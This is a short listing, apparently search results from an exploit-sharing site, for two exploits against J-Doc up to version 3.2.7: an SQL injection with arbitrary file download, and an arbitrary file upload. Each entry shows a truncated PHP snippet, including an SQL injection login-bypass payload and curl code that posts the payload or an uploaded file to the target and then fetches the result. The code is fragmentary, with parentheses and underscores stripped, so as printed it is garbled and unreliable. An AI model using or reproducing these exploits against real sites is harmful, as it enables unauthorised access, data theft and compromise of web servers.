2 matches found
J-Doc <= v3.2.7 SQL Injection + Arbitrary download file
Exploit for php platform in category web applications 'lol' or idutilisateur = 1 -- ', 'password' = 'lol'; // Connection $curl = curlinit; curlsetopt$curl, CURLOPTURL, $baseurl.$folder.'index.php'; curlsetopt$curl, CURLOPTPOST, true; curlsetopt$curl, CURLOPTCOOKIEJAR, $cookiesfile;...
J-Doc <= v3.2.7 Arbitrary file upload
Exploit for php platform in category web applications '@'.$filetoupload, ; curlsetopt$curl, CURLOPTPOSTFIELDS, $post; if curlexec$curl echo filegetcontents$baseurl.'divers/'.$folder.'/'.$filetocall; else die'error in the exploit'; 0day.today 2018-04-09...